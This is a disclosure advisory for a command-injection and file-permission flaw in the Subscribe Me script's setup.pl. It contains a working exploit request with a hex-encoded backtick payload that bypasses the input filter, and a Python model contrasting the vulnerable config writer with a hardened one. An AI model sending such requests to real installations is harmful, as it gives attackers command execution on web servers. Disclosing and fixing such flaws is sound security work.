Subscribe Me Pro/Enterprise is "a mailing list management script developed by siteinteractive". Several flaws in setup.pl allow an attacker to inject shell commands into config.pl through a backtick variable-injection flaw, and then to exploit a file-permission problem to execute config.pl.
Exploit:
This attack tricks the Perl script setup.pl into thinking that Subscribe Me has just been installed and needs to be set up. During setup, setup.pl writes all the supplied configuration variables to config.pl. setup.pl does some input validation, but it is easily bypassed by hex (URL) encoding all data that you send.
Run through of the exploit:
First we send the request below, which injects the command '/usr/bin/id > id' and tells setup.pl to create all files with mode 777 (the notification value is hex-encoded; it decodes to " .`/usr/bin/id > id` ."):
http://victim.com/cgi-bin/setup.pl?RUNINSTALLATION=yes&information=~&extension=pl
&config=pl&permissions=777&os=notunixornt&perlpath=/usr/bin/perl&mailprog=/bin/sh
&notification="%20.`%2F%75%73%72%2F%62%69%6E%2F%69%64%20%3E%20%69%64`%20."&websiteurl=evilhacker&br_username=evilhacker&session_id=0&cgipath=.
This will return a page saying, "Please set your administration password" (you will not be able to).
setup.pl has now written the following line to config.pl (note the backticks): $notification = "" .`/usr/bin/id > id` . "";
Moreover, config.pl is now mode -rwxrwxrwx. Requesting http://victim.com/cgi-bin/config.pl executes our Perl.
As a result, http://victim.com/cgi-bin/id is created and contains: uid=48(apache) gid=48(apache) groups=48(apache)
Using this technique, any system command can be injected and run as the web server user.
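The setup.pl-to-config.pl write, modelled in Python as an added example (this is not siteinteractive's code, and the real setup.pl is not reproduced). It assumes two things the advisory implies but does not spell out: that setup.pl's filter inspects the raw, still-encoded parameter value, and that the decoded value is interpolated into a Perl double-quoted string, where backticks execute a shell command. The blacklist, the fully hex-encoded payload and the benign sample value are constructed for the example. The vulnerable writer reproduces the $notification line shown above and the 0777 mode; the hardened writer decodes before validating, emits a single-quoted Perl literal (in which backticks are inert), and writes the file mode 0600.

```python
"""
Model of the setup.pl -> config.pl flaw described in the advisory.
Added example, not siteinteractive's code; the real setup.pl is not
reproduced and its exact filter is unknown (assumptions noted inline).
"""
import os
import re
import stat
import tempfile
from typing import Optional
from urllib.parse import unquote_plus

# Constructed payload: the advisory's notification value, fully hex-encoded.
# Decodes to:  " .`/usr/bin/id > id` . "
ENCODED_PAYLOAD = "%22%20.%60%2F%75%73%72%2F%62%69%6E%2F%69%64%20%3E%20%69%64%60%20.%20%22"

# Hypothetical blacklist standing in for whatever setup.pl checks.
FORBIDDEN = re.compile(r"[`$;|&]")


def decode_payload(raw: str) -> str:
    """What a CGI script sees after URL-decoding the query parameter."""
    return unquote_plus(raw)


def vulnerable_config_line(raw: str) -> Optional[str]:
    """Assumed setup.pl behaviour: filter first, decode second.
    '%60' passes the check and only becomes a backtick afterwards.
    Returns the Perl line that would be written, or None if rejected."""
    if FORBIDDEN.search(raw):
        return None
    # Interpolated into double quotes: "" .`/usr/bin/id > id` . "" is valid Perl
    return '$notification = "%s";\n' % decode_payload(raw)


def perl_single_quoted(value: str) -> str:
    """Emit a Perl single-quoted literal. Only backslash and the quote itself
    are special inside one; backticks, $ and @ are inert, so the value can
    neither run a command nor interpolate a variable."""
    return "'" + value.replace("\\", "\\\\").replace("'", "\\'") + "'"


def hardened_config_line(raw: str) -> Optional[str]:
    """Decode first, validate the decoded form, and never interpolate into
    a double-quoted Perl string."""
    value = decode_payload(raw)
    if FORBIDDEN.search(value):
        return None
    return "$notification = %s;\n" % perl_single_quoted(value)


def write_config(path: str, line: str, mode: int) -> int:
    """Write config.pl and apply the requested mode; returns the resulting
    permission bits. setup.pl takes the mode from the 'permissions'
    parameter, which is how the exploit obtains 0777."""
    with open(path, "w") as fh:
        fh.write(line)
    os.chmod(path, mode)
    return stat.S_IMODE(os.stat(path).st_mode)


def demo() -> dict:
    """Run both writers against the payload in a scratch directory."""
    result = {}
    with tempfile.TemporaryDirectory() as tmp:
        vuln = vulnerable_config_line(ENCODED_PAYLOAD)
        result["vulnerable_line"] = vuln
        result["vulnerable_mode"] = write_config(os.path.join(tmp, "config.pl"), vuln, 0o777)
        # The same payload is rejected once the decoded form is checked.
        result["hardened_line"] = hardened_config_line(ENCODED_PAYLOAD)
        # Constructed benign value: goes through the hardened path and is quoted safely.
        safe = hardened_config_line("Thanks%20for%20subscribing%2C%20it%27s%20live")
        result["hardened_benign"] = safe
        result["hardened_mode"] = write_config(os.path.join(tmp, "config.pl"), safe, 0o600)
    return result


if __name__ == "__main__":
    for key, val in demo().items():
        print(key, repr(val))
```

The generated file is written but never executed here; the point is the text that lands in config.pl and its mode. Note that the blacklist alone remains a weak control even when applied after decoding: the single-quoted literal and the 0600 mode are what actually close the injection and the permission problem respectively.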
Vendor status:
The company was contacted by email (support@) on Monday 15 December, notified that the exploit would be released on 19 December, and told how to fix the problem. No reply was received, and no official fix has been released.
Workaround:
Remove setup.pl once installation is complete, and chmod config.pl to read-only. A world-writable config.pl (as produced by permissions=777) can also be edited by any local user, so check its mode even if setup.pl has already been removed.